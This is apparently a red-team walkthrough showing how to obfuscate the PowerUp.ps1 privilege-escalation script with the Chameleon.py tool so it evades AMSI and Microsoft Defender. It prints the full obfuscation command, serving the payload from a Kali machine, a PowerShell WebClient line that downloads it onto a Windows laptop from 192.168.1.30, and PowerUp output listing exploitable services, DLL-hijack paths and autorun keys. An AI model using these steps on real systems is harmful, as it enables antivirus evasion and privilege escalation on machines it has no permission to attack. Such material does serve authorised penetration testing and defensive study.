=========================================================================================================================================================
Simple AV bypass using the PowerShell obfuscation script 'Chameleon.py'
=========================================================================================================================================================

Chameleon is a PowerShell obfuscation tool designed to bypass AMSI and commercial antivirus solutions.

=> Source: https://github.com/klezVirus/chameleon
           https://klezvirus.github.io/RedTeaming/AV_Evasion/BornFromAChimera/
           
The objective is to use 'chameleon.py' to obfuscate offensive powershell scripts so we can copy them on the disk of a target Windows laptop or 
Windows server and then run them without being detected and deleted by the Microsoft Defender AV (or other AV products).

The tool has been developed as a Python port of the Chimera project. As such, it uses mostly the same techniques to evade common detection signatures, 
such as:
> comment deletion/substitution
> string substitution (variables, functions, data-types)
> variable concatenation
> indentation randomization
> semi-random backticks insertion
> case randomization
> encoding


=========================================================================================================================================================
PoC - Example with the script 'PowerUp.ps1' running on a Windows 10 laptop (fully patched with the MS Defender AV enabled and up-to-date)
=========================================================================================================================================================

Step 1 - Obfuscate the script 'PowerUp.ps1' with Chameleon.py on a Kali VM
----------------------------------------------------------------------------------

usage: chameleon.py [-h] [-l {0,1,2,3,4,5}] -o OUTPUT [-v] [-s] [-d] [-n] [-c] [-f] [-b] [--random-backticks] [-r] [-i] [-x] [-j] [-a] [--decimal] [--base64] [-z] [-F FUNCTION_MAPPING] [-K KEYWORDS] [-B BACKTICKS] [-t {r,d,h}] [--safe] [--verbose] [--about]
                    target

Chameleon - PowerShell script obfuscator (Improved Python port of Chimera)

positional arguments:
  target                Script to obfuscate

optional arguments:
  -h, --help            show this help message and exit
  -l {0,1,2,3,4,5}, --level {0,1,2,3,4,5}
                        String manipulation Level (1: MIN, 5: MAX, 0: RANDOM)
  -o OUTPUT, --output OUTPUT
                        Store the payload in a file
  -v, --variables       Enable variable obfuscation
  -s, --strings         Enable string obfuscation
  -d, --data-types      Enable data types obfuscation
  -n, --nishang         Enable Nishang scripts obfuscation
  -c, --comments        Enable comments obfuscation
  -f, --functions       Enable functions obfuscation
  -b, --use-backticks   Enable use of backticks with generated strings
  --random-backticks    Enable use of backticks randomization
  -r, --random-cases    Enable upper/lower randomization
  -i, --random-spaces   Enable indentation randomization
  -x, --hex-ip          Enable indentation randomization
  -j, --true-false-null
                        Try and obfuscate $true, $false and $null (experimental)
  -a, --enable-all      Enable all obfuscation types
  --decimal             Convert obfuscated payload to decimal format
  --base64              Convert obfuscated payload to base64 format
  -z, --check           Check the script against AMSI Trigger (@RythmStick, @rasta-mouse)
  -F FUNCTION_MAPPING, --function-mapping FUNCTION_MAPPING
                        Add custom keywords to obfuscate
  -K KEYWORDS, --keywords KEYWORDS
                        Add custom keywords to obfuscate
  -B BACKTICKS, --backticks BACKTICKS
                        Add a list of words to backtick
  -t {r,d,h}, --randomization-type {r,d,h}
                        Type of randomization (r: Random, d: Dictionary, h: Hybrid)
  --safe                Reduce obfuscation of certain variables
  --verbose             Enable verbose output
  --about               Shows additional information about the tool


jeff@kali:~/Documents/Tools/chameleon-main$ python3 ./chameleon.py -K jeff -l 5 -a ./powerup.ps1 -o ./chameleon-p0w3rup1.ps1 --decimal
sh: 1: color: not found
__________________________________________________________________________________
                                                                                                                                                                                                                                           
  ▒▒▒▒▒▒  ▒▒   ▒▒  ▒▒▒▒▒  ▒▒▒    ▒▒▒ ▒▒▒▒▒▒▒ ▒▒     ▒▒▒▒▒▒▒  ▒▒▒▒▒  ▒▒▒  ▒▒  ▒▒▒                                                                                                                                                           
  ▒▒      ▒▒   ▒▒ ▒▒   ▒▒ ▒▒▒▒  ▒▒▒▒ ▒▒      ▒▒     ▒▒      ▒▒   ▒▒ ▒▒▒▒ ▒▒ ▒▒▒▒                                                                                                                                                           
  ▓▓      ▓▓▓▓▓▓▓ ▓▓▓▓▓▓▓ ▓▓ ▓▓▓▓ ▓▓ ▓▓▓▓▓   ▓▓     ▓▓▓▓▓   ▓▓   ▓▓ ▓▓ ▓▓▓▓   ▓▓                                                                                                                                                           
  ██      ██   ██ ██   ██ ██  ██  ██ ██      ██     ██      ██   ██ ██  ███   ██                                                                                                                                                           
  ██████  ██   ██ ██   ██ ██      ██ ███████ ██████ ███████  █████  ██   ██   ██                                                                                                                                                           
----------------------------------------------------------------------------------                                                                                                                                                         
▒ by d3adc0de (@klezVirus)                                                                                                                                                                                                                 
__________________________________________________________________________________                                                                                                                                                         
                                                                                                                                                                                                                                           
[+] Starting obfuscation at 2022-12-13 00:10:47.751341                                                                                                                                                                                     
  [*] Zeroing out comments... Done                                                                                                                                                                                                         
[+] Chameleon: standard obfuscation                                                                                                                                                                                                        
  [*] Identifying scoped variables and reflective constructors                                                                                                                                                                             
    [>] Generating function mapping... Success                                                                                                                                                                                             
    [>] Identified 67 scoped variables which will not be obfuscated                                                                                                                                                                        
  [*] Variables Obfuscation... Done                                                                                                                                                                                                        
  [*] Data Types Obfuscation... Done                                                                                                                                                                                                       
  [*] Function Obfuscation... Done                                                                                                                                                                                                         
  [*] Nishang Obfuscation... Done                                                                                                                                                                                                          
  [*] Cases randomization... Done                                                                                                                                                                                                          
  [*] IP Address to Hex... Done                                                                                                                                                                                                            
  [*] Comments Obfuscation... Done                                                                                                                                                                                                         
  [*] Indentation Randomization... Done                                                                                                                                                                                                    
  [*] Strings Obfuscation... Done                                                                                                                                                                                                          
[+] Chameleon: obfuscation via encoding                                                                                                                                                                                                    
  [*] Converting to decimal... Done                                                                                                                                                                                                        
  [*] Writing obfuscated payload to ./chameleon-p0w3rup1.ps1... Done                                                                                                                                                                       
[+] Ended obfuscation at 2022-12-13 00:10:55.818079      


jeff@kali:~/Documents/Tools/chameleon-main$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...


Step 2 - Check that the obfuscated script 'chameleon-p0w3rup1.ps1' is working properly without being detected by the AMSI / Defender AV
----------------------------------------------------------------------------------------------------------------------------------------

=> We use a low-privileged user account named "auditor"

PS C:\temp> whoami
laptop1\auditor

PS C:\temp> net user auditor
User name                    auditor
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            13/12/2022 01:14:17
Password expires             11/06/2023 01:14:17
Password changeable          13/12/2022 01:14:17
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   13/12/2022 01:14:44

Logon hours allowed          All

Local Group Memberships      *Users
Global Group memberships     *None
The command completed successfully.


=> The MS Defender AV is running with the "real-time protection" setting enabled.

PS C:\temp> amsiscanbuffer
At line:1 char:1
+ amsiscanbuffer
+ ~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent


=> We download and execute our obfuscated script 'chameleon-p0w3rup1.ps1' without being blocked by the MS Defender AV

PS C:\temp> (New-Object Net.WebClient).DownloadFile("http://192.168.1.30:8080/chameleon-p0w3rup1.ps1","C:\temp\chameleon-p0w3rup1.ps1")
PS C:\temp> import-module C:\temp\chameleon-p0w3rup1.ps1
PS C:\temp> invoke-allchecks

ServiceName                     : edgeupdate
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : AppendData/AddSubdirectory
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : bedGMqdrDEwdqmYXMSOKeuFdwrhSoumKQtfqvlIS -Name 'edgeupdate'
CanRestart                      : False
Name                            : edgeupdate
Check                           : Modifiable Service Files

<SNIP>

ModifiablePath    : C:\Python27
IdentityReference : NT AUTHORITY\Authenticated Users
Permissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
%PATH%            : C:\Python27
Name              : C:\Python27
Check             : %PATH% .dll Hijacks
AbuseFunction     : LSZkZCVxXrdNyziCdjcHsfdRiQujrzGmdsdSOKkde -DllPath 'C:\Python27\wlbsctrl.dll'

<SNIP>

Key            : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ConnectionCenter
Path           : "C:\Program Files (x86)\Citrix\ICA Client\concentr.exe" /startup
ModifiableFile : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=AppendData/AddSubdirectory}
Name           : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ConnectionCenter
Check          : Modifiable Registry Autorun

<SNIP>
